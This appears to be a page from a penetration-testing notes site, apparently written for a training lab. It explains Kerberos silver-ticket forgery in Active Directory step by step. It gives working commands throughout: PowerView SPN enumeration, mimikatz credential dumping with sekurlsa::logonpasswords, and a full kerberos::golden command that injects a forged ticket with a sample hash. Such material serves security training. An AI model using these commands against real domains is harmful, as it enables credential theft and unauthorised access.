Silver Tickets

Many a time, the user and group permissions in the service ticket are not verified by the application. Also, Privileged account certificate (PAC) validation (Which is an optional process) is not done by the application and domain controller. If this is enabled, the user authenticating to the service and its privileges are validated by the domain controller.

With a service account password or hash, We can forge our service ticket to access the resource with any permission that we desire. This type of ticket is known as a silver ticket.

In general, we need to collect the following three pieces of information to create a silver ticket:

SPN password hash
Domain SID (Domain user SID)
Target SPN

Step 1: To check if our current user has access to a resource of HTTP SPN or any SPN.

# Example:
iwr -UseDefaultCredentials http://web04

# To check the list of SPN for users present.
Import-Module .\PowerView.ps1
Get-NetUser -SPN | select samaccountname,serviceprincipalname

Now we will collect all the information needed to forge the silver ticket as stated before.

Step 2: Run mimikatz to extract the AD cached credential.

.\mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit"
# In our case we are focused on the iis_service account so, we will make a note of this user NTLM hash.
# We have the first piece of information. Now we will collect domain SID.

Step 3: Domain SID Collection (excluding the identifier)

We can collect this from our current domain user using mimikatz output also.

# Collecting the domain SID (everything except the part that is the domain RID)
whoami /user
# Example:
# User Name SID
# ========= =============================================
# corp\jeff S-1-5-21-1987370270-658905905-1781884369-1105

Step 4: Targeting the SPN

The last list item is the target SPN. For this example, we'll target the HTTP SPN resource on WEB04 (HTTP/web04.corp.com:80) because we want to access the web page running on IIS.

web04.corp.com

Step 5: Creating a Silver Ticket

# Creating a silver ticket
# Commanod for silver or golden ticket is same.
# Point to note:
# Module used: kerberos::golden
# Domain SID (/sid:) - Provide the domain's Security Identifier.
# Domain Name (/domain:) - Provide the domain name.
# Target (/target:) - Specify the target where the SPN is running.
# SPN Protocol (/service:) - Include the SPN service protocol.
# NTLM Hash (/rc4:) - Provide the NTLM hash of the SPN.
# Ticket Injection (/ptt) - Use this to inject the forged ticket into the machine's memory.
# User (/user:) - Specify the domain user (e.g., jeffadmin) to set in the forged ticket. For this example, we'll use jeffadmin. However, we could also use any other domain user since we can set the permissions and groups ourselves.
# Final command example:
 .\mimikatz.exe "kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin"
 
# If successfully created you will get msg like this:
# Golden ticket for 'jeffadmin @ corp.com' successfully submitted for the current session

# You can check ticket is in memory or not using klist
klist

# Example: 
# Now try to access the service.
iwr -UseDefaultCredentials http://web04
# Way to get page content:
#  (iwr -UseDefaultCredentials http://web04).content

Since silver and golden tickets represent powerful attack techniques, Microsoft issued a security patch to update the PAC structure. This patch requires the PAC_REQUESTOR field to be validated by a domain controller, preventing the forgery of tickets for non-existent domain users when the client and KDC are in the same domain. Without this patch, one could create silver tickets for users that do not exist. This update has been enforced since October 11, 2022.

TIP:

iwr -UseDefaultCredentials http://web04 # This will list all variables
# If you want to see the content.
$content= iwr -UseDefaultCredentials http://web04 
$content.content # This will show you the content of page.

PreviousKerberoasting NextDomain controller synchronization (Dcsync attack)

Last updated 1 year ago